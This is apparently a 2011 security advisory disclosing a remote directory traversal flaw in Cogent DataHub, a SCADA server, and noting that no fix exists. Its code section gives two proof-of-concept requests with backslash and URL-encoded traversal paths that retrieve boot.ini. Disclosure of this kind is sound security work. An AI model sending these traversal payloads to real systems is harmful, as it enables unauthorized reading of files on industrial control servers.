Luigi Auriemma
Application: Cogent DataHub
Versions: <=
Platforms: Windows
Bug: directory traversal
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
1) Introduction
2) Bug
3) The Code
4) Fix
1) Introduction
DataHub is a software for the SCADA and automation sector.
2) Bug
The server/service listens on port 80 using a custom web server.
The software is affected by a directory traversal vulnerability
through the backslash delimiter (both ascii and http encoded) that
allows to download the files located on the disk where it's installed.
3) The Code
mydown http://SERVER/..\..\..\..\..\..\..\boot.ini
mydown http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
4) Fix
No fix.